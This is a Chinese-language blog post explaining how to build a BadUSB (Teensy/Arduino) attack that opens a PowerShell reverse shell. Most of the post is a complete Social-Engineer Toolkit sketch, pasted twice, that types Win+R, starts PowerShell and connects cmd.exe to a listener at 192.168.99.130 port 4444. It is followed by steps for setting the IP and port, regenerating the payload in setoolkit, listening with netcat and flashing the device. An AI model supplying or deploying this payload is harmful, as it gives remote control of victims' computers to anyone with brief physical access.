badusb_nc反弹shell

转载请注明来自 b0t0w1’blog

思路为运用powershell连接监听机，把powershell的命令烧录进badusb中。

payload：

//// Social-Engineer Toolkit Teensy Attack Vector// Written by: Dave Kennedy (ReL1K) and Josh Kelley (WinFaNG)//// Special thanks to: Irongeek// You will need to setup a netcat listener MSF cannot handle this payload//// 2011-02-28 padzero@gmail.com// * Added "ALT code" print functions (ascii_*): Fixed payload execution on non-english keymap targets// * Changed from script to interactive powershell execution: Bypass Restricted Powershell Execution Policies//#define ascii_println Keyboard.printlnvoid setup() {   delay(10000);  omg("powershell");  delay(1000);  // Here is the payload...  // This is a reverse bind shell through powershell.  I need to fix it use the   // bind shell.  The reverse bind shell code is cleaner though.  // I bet we could use the dip switches to configure the IP addy or port...  ascii_println("function cleanup {");  ascii_println("if ($client.Connected -eq $true) {$client.Close()}");  ascii_println("if ($process.ExitCode -ne $null) {$process.Close()}");  ascii_println("exit}");  // Setup 192.168.99.130 HERE  ascii_println("$address = '192.168.99.130'");  // Setup PORT HERE  ascii_println("$port = '4444'");  ascii_println("$client = New-Object system.net.sockets.tcpclient");  ascii_println("$client.connect($address,$port)");  ascii_println("$stream = $client.GetStream()");  ascii_println("$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize");  ascii_println("$process = New-Object System.Diagnostics.Process");  ascii_println("$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'");  ascii_println("$process.StartInfo.RedirectStandardInput = 1");  ascii_println("$process.StartInfo.RedirectStandardOutput = 1");  ascii_println("$process.StartInfo.UseShellExecute = 0");  ascii_println("$process.Start()");  ascii_println("$inputstream = $process.StandardInput");  ascii_println("$outputstream = $process.StandardOutput");  ascii_println("Start-Sleep 1");  ascii_println("$encoding = new-object System.Text.AsciiEncoding");  ascii_println("while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}");  ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.Length)");  ascii_println("$out = $null; $done = $false; $testing = 0;");  ascii_println("while (-not $done) {");  ascii_println("if ($client.Connected -ne $true) {cleanup}");  ascii_println("$pos = 0; $i = 1");  ascii_println("while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {");  ascii_println("$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)");  ascii_println("$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}");  ascii_println("if ($pos -gt 0) {");  ascii_println("$string = $encoding.GetString($networkbuffer,0,$pos)");  ascii_println("$inputstream.write($string)");  ascii_println("start-sleep 1");  ascii_println("if ($process.ExitCode -ne $null) {cleanup}");  ascii_println("else {");  ascii_println("$out = $encoding.GetString($outputstream.Read())");  ascii_println("while($outputstream.Peek() -ne -1){");  ascii_println("$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}");  ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.length)");  ascii_println("$out = $null");  ascii_println("$string = $null}} else {cleanup}}");  ascii_println(""); //Enter to start execution}void loop() {}void omg(char *SomeCommand){  Keyboard.set_modifier(128);   Keyboard.set_key1(KEY_R);  Keyboard.send_now();   Keyboard.set_modifier(0);   Keyboard.set_key1(0);   Keyboard.send_now();   delay(1500);  ascii_println(SomeCommand);}//// Social-Engineer Toolkit Teensy Attack Vector// Written by: Dave Kennedy (ReL1K) and Josh Kelley (WinFaNG)//// Special thanks to: Irongeek// You will need to setup a netcat listener MSF cannot handle this payload//// 2011-02-28 padzero@gmail.com// * Added "ALT code" print functions (ascii_*): Fixed payload execution on non-english keymap targets// * Changed from script to interactive powershell execution: Bypass Restricted Powershell Execution Policies//#define ascii_println Keyboard.printlnvoid setup() {   delay(10000);  omg("powershell");  delay(1000);  // Here is the payload...  // This is a reverse bind shell through powershell.  I need to fix it use the   // bind shell.  The reverse bind shell code is cleaner though.  // I bet we could use the dip switches to configure the IP addy or port...  ascii_println("function cleanup {");  ascii_println("if ($client.Connected -eq $true) {$client.Close()}");  ascii_println("if ($process.ExitCode -ne $null) {$process.Close()}");  ascii_println("exit}");  // Setup 192.168.99.130 HERE  ascii_println("$address = '192.168.99.130'");  // Setup PORT HERE  ascii_println("$port = '4444'");  ascii_println("$client = New-Object system.net.sockets.tcpclient");  ascii_println("$client.connect($address,$port)");  ascii_println("$stream = $client.GetStream()");  ascii_println("$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize");  ascii_println("$process = New-Object System.Diagnostics.Process");  ascii_println("$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'");  ascii_println("$process.StartInfo.RedirectStandardInput = 1");  ascii_println("$process.StartInfo.RedirectStandardOutput = 1");  ascii_println("$process.StartInfo.UseShellExecute = 0");  ascii_println("$process.Start()");  ascii_println("$inputstream = $process.StandardInput");  ascii_println("$outputstream = $process.StandardOutput");  ascii_println("Start-Sleep 1");  ascii_println("$encoding = new-object System.Text.AsciiEncoding");  ascii_println("while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}");  ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.Length)");  ascii_println("$out = $null; $done = $false; $testing = 0;");  ascii_println("while (-not $done) {");  ascii_println("if ($client.Connected -ne $true) {cleanup}");  ascii_println("$pos = 0; $i = 1");  ascii_println("while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {");  ascii_println("$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)");  ascii_println("$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}");  ascii_println("if ($pos -gt 0) {");  ascii_println("$string = $encoding.GetString($networkbuffer,0,$pos)");  ascii_println("$inputstream.write($string)");  ascii_println("start-sleep 1");  ascii_println("if ($process.ExitCode -ne $null) {cleanup}");  ascii_println("else {");  ascii_println("$out = $encoding.GetString($outputstream.Read())");  ascii_println("while($outputstream.Peek() -ne -1){");  ascii_println("$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}");  ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.length)");  ascii_println("$out = $null");  ascii_println("$string = $null}} else {cleanup}}");  ascii_println(""); //Enter to start execution}void loop() {}void omg(char *SomeCommand){  Keyboard.set_modifier(128);   Keyboard.set_key1(KEY_R);  Keyboard.send_now();   Keyboard.set_modifier(0);   Keyboard.set_key1(0);   Keyboard.send_now();   delay(1500);  ascii_println(SomeCommand);}

这里使用靶机的powershell连接监听机。如果是xp等则没有用。
payload是kali set 工具箱中给出的payload代码，使用时需要该的地方是109行和111行的ip以及端口号。ip为监听的ip，推荐使用linux监听，port是监听所用的端口。或者可以亲自在kali中生成：
在 terminal 中输入：

setoolkit

进去后依次选择1、6、3。即可生成。
前面的注释信息也指出，这里必须用 nc 进行监听

使用meterpreter不会成功.

显示貌似获得了shell，其实并没有得到meterpreter。

使用 nc 监听4444端口，获得了靶机的shell。
使用方法依然是跟以前一样，把payload保存为 .pde 格式，直接拖进arduino即可，然后烧录。

转载请注明来自 b0t0w1’blog